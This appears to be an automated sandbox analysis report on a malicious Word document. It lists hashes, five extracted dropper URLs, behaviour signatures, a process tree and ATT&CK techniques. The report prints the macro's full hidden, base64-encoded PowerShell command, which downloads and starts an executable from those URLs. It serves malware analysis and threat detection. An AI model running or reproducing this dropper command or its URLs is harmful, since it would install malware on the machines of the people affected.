33e3844418c24c485809c1e88aeec5edeb61c951dc15fd342b747920d564574d

General

Target

33e3844418c24c485809c1e88aeec5edeb61c951dc15fd342b747920d564574d.doc
Size

184KB
MD5

b7b7816ab8e441be97cc8d0d012488cd
SHA1

edafaaa99a8d966b677f3bd5c547ab9121674f31
SHA256

33e3844418c24c485809c1e88aeec5edeb61c951dc15fd342b747920d564574d
SHA512

1816135352322f8e646afcc15f4c7259aa10747d3ee5baca3bb68b1330a664f4db6d8e32c13ea34f769b856a61ef35580dca6d984efe0f16087a089c006779e9
SSDEEP

3072:Wx2y/GdynktGDWLS0HZWD5w8K7Nk9uD7IBUnUasgt+PpkkrbfzHQfzZExXMHIwtn:Wx2k43tGiL3HJk9uD7bnUasFPpkkrbfs

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://amstaffrecords.com/individualApi/0/

exe.dropper

http://foozoop.com/wp-content/Qxi7iVD/

exe.dropper

http://7arasport.com/validatefield/gj/

exe.dropper

http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/

exe.dropper

https://diagnostica-products.com/wp-admin/hio2u7w/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	408	4600	Powershell.exe	83

Blocklisted process makes network request 1 IoCs

flow	pid	Process
30	408	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
408	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4792	WINWORD.EXE
4792	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
408	Powershell.exe
408	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	408	Powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4792	WINWORD.EXE
4792	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4792	WINWORD.EXE
4792	WINWORD.EXE
4792	WINWORD.EXE
4792	WINWORD.EXE
4792	WINWORD.EXE
4792	WINWORD.EXE
4792	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4792 wrote to memory of 552	4792	WINWORD.EXE	86
PID 4792 wrote to memory of 552	4792	WINWORD.EXE	86

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33e3844418c24c485809c1e88aeec5edeb61c951dc15fd342b747920d564574d.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4792
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:552

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EE51A811.wmf

Filesize
444B

MD5
3bc04b7a68be5f9fdb51744a14caa591

SHA1
506181f4d1044d0f9b86693f4032e3303fc6a2e8

SHA256
817103c2de20e9a871c91c43462098957e6756e4a11bf3839f445fa5ef49948e

SHA512
59182c369b0e1a0a0d139ec02d1bf344e561323649ead025cca3b329bd786a9ad6563eac855c13e7622f1e3867174b24a9e5b7cc909b4abea01afd74bf3c5fd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDEDA4.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5zseyvq.4ts.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
ec0310f71be40cdc3a2f6e3e9abe3af7

SHA1
bf773498d5c797b50bb1ed73310ab9c789b03b59

SHA256
4cf0ee41d7afbfe7043795be2572e7d8a722c3d64c73a5585d8358e6477c0838

SHA512
f2be27593dfc4688d6ddc6cdb821192f0b8a9825f4c516643f7024d2faad62d2ccb3b80189c06a607fa123dff97cee507007a9ee83798afb981c71af58008cf6

Download Submit
memory/408-66-0x000001EB7EA60000-0x000001EB7EA82000-memory.dmp

Filesize
136KB

Download
memory/4792-14-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-19-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-9-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-11-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-8-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-7-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-6-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-13-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-12-0x00007FF980CC0000-0x00007FF980CD0000-memory.dmp

Filesize
64KB

Download
memory/4792-1-0x00007FF9C32CD000-0x00007FF9C32CE000-memory.dmp

Filesize
4KB

Download
memory/4792-16-0x00007FF980CC0000-0x00007FF980CD0000-memory.dmp

Filesize
64KB

Download
memory/4792-20-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-21-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-10-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-18-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-17-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-15-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-5-0x00007FF9832B0000-0x00007FF9832C0000-memory.dmp

Filesize
64KB

Download
memory/4792-4-0x00007FF9832B0000-0x00007FF9832C0000-memory.dmp

Filesize
64KB

Download
memory/4792-2-0x00007FF9832B0000-0x00007FF9832C0000-memory.dmp

Filesize
64KB

Download
memory/4792-73-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-74-0x00007FF9C32CD000-0x00007FF9C32CE000-memory.dmp

Filesize
4KB

Download
memory/4792-75-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-76-0x00007FF9C3230000-0x00007FF9C3425000-memory.dmp

Filesize
2.0MB

Download
memory/4792-3-0x00007FF9832B0000-0x00007FF9832C0000-memory.dmp

Filesize
64KB

Download
memory/4792-0-0x00007FF9832B0000-0x00007FF9832C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads